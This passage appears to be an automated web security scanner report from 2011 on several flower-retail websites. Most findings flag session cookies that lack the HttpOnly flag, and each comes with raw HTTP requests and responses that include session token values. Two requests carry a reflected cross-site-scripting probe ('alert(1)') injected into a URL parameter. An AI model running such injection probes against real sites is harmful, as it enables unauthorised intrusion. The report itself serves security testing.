GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dNGqKXu-V4E9FonaYphG7gq:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37878


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...
13.7. http://ww30.1800flowers.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:38 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: FSESSIONID=2f6aa588e33f44c3bb0191955def6935; Path=/; Domain=1800flowers.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800flowers.com
Set-Cookie: ShopperManagerEnterprise=41db6fdb-b7c6-458a-b4c5-a2060d927f3c; Expires=Thu, 06-May-21 01:00:38 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63361


<html>

<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<!--MSN--><meta name="msvalidate.01" content="7372219C2822
...[SNIP]...
13.8. http://ww30.1800flowers.com/collection.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000oqktH2yyDUkrp5oGcWwUdty:-1; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.1.10.1304902847; cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:04:11 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qD3wSlEaCI6fvlpmlKhLnKM:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 73822


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
13.9. http://ww30.1800flowers.com/deliverycalendarnew.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /deliverycalendarnew.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:10:33 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000nxW65vjjsfTSi330BxyCo7S:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37743


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text
...[SNIP]...
13.10. http://ww30.1800flowers.com/guidedmodel.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /guidedmodel.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guidedmodel.do?dataset=10305&viewCounts=0 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.2.10.1304902847
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:04:54 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dkHruW9CzZio-yRk_Iqcrqc:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4311


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>

</head>

<body>


<SCRIPT>

$(function(){    
   
   var isSameDay
...[SNIP]...
13.11. http://ww30.1800flowers.com/product.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:11:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Location: http://ww30.1800flowers.com/shoppingbasket.do
Set-Cookie: JSESSIONID=0000WBtYpk6MHvW-ksHuJLcHDSO:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 0

13.12. http://ww30.1800flowers.com/shoppingbasket.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:22 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000GsjYiBW6hk4zCZT985cxiBR:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 62042


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
13.13. https://ww30.1800flowers.com/checkoutsignin.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
13.14. https://ww30.1800flowers.com/continueasguest.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /continueasguest.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1
Content-Length: 9

x=74&y=15

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XbGXHrF9nwuNJodRv3iY_Xi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 1142175


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
13.15. http://www.cherrymoonfarms.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.cherrymoonfarms.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=p4m5s4gmscsdxjspfxzi5djy; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=p4m5s4gmscsdxjspfxzi5djy; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=nta-2,xca-1,nte-1,cpz-1,csc-4,ntb-1,ntc-1,xcb-1,xcc-1,cfq-1,ntd-2; domain=.cherrymoonfarms.com; expires=Sat, 09-Jun-2012 12:22:05 GMT; path=/
Set-Cookie: ENDOFDAY_CMF=TestAssignmentValues=,chh-1,cks-1,mpsmediapersonalitysplit-1,ckt-2; domain=.cherrymoonfarms.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=5/9/2011 5:22:05 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.cherrymoonfarms.com; expires=Thu, 12-May-2011 12:22:05 GMT; path=/
Set-Cookie: CMF_BrowserId=648da04f-a5ff-42b4-9370-fae55b915cad; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:04 GMT
Content-Length: 107521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
13.16. http://www.personalcreations.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


